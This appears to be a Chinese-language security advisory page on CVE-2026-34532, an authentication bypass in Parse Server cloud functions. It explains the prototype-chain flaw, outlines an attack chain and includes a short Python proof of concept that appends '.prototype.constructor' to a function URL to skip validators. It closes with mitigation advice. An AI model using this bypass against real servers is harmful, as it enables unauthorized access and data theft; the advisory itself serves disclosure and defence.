IPBUF安全漏洞报告
English
CVE-2026-34532 CVSS 9.1 严重

CVE-2026-34532 Parse Server云函数验证绕过漏洞

披露日期: 2026-03-31
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-34532
漏洞类型
访问控制绕过
CVSS评分
9.1 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Parse Server

相关标签

访问控制绕过Parse ServerNode.js逻辑漏洞CVE-2026-34532Authentication Bypass

漏洞概述

Parse Server在特定版本前存在安全漏洞,攻击者可通过在URL中追加“prototype.constructor”绕过Cloud Function的验证器访问控制。该问题源于handler解析与验证器检查机制不一致,导致未经身份验证的用户可调用本应受保护的云函数,造成严重的安全风险。

技术细节

该漏洞的核心在于Parse Server处理Cloud Function触发器与验证器时的逻辑不一致。在受影响的版本中,当通过URL调用云函数时,系统会解析handler(处理函数)。如果handler是通过`function`关键字声明的,解析过程会利用原型链进行查找。然而,对应的验证器(Validator,如`requireUser`)在查找时并未正确实现原型链遍历。攻击者利用这一差异,将请求路径中的函数名修改为`FunctionName.prototype.constructor`。这使得系统成功定位到了handler,但在检查验证器时却因为路径不匹配而跳过了验证步骤。最终,攻击者可以在没有提供任何认证凭证(如Session Token或Master Key)的情况下,成功调用那些本应受到严格权限保护的云函数,从而窃取数据或破坏系统完整性。

攻击链分析

STEP 1
侦察
攻击者识别出目标运行的是易受攻击版本的Parse Server,并确定了使用`function`关键字定义且受验证器保护的Cloud Function名称。
STEP 2
构造攻击向量
攻击者构造特定的API请求URL,在目标Cloud Function名称后追加“.prototype.constructor”(例如:/functions/sensitiveAction.prototype.constructor)。
STEP 3
发送恶意请求
攻击者向Parse Server端点发送POST请求,请求中无需包含有效的用户Session Token或Master Key。
STEP 4
触发逻辑漏洞
服务器端解析Handler时通过原型链成功找到函数定义,但在查找验证器时未能同步遍历,导致访问控制检查(如requireUser)被跳过。
STEP 5
未授权执行
服务器执行Cloud Function代码,并将结果返回给攻击者,完成了权限绕过和未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL of the vulnerable Parse Server # The vulnerable endpoint appends '.prototype.constructor' to the function name target_url = "http://vulnerable-parse-server.com/parse/functions/protectedAction.prototype.constructor" # Headers (usually empty or minimal for this exploit as it bypasses auth) headers = { "Content-Type": "application/json" } # Payload to send to the cloud function payload = { "param1": "test_value" } try: response = requests.post(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful! Access control bypassed.") print("[+] Response:", response.text) else: print("[-] Request failed. Status code:", response.status_code) print("[-] Response:", response.text) except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

Parse Server < 8.6.67
Parse Server < 9.7.0-alpha.11

防御指南

临时缓解措施
如果无法立即升级,建议在WAF或反向代理层实施严格的URL过滤规则,拦截包含“.prototype.constructor”字符串的入站请求。同时,在应用层面对Cloud Function接口实施网络层访问控制(如IP白名单),以减少攻击面。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表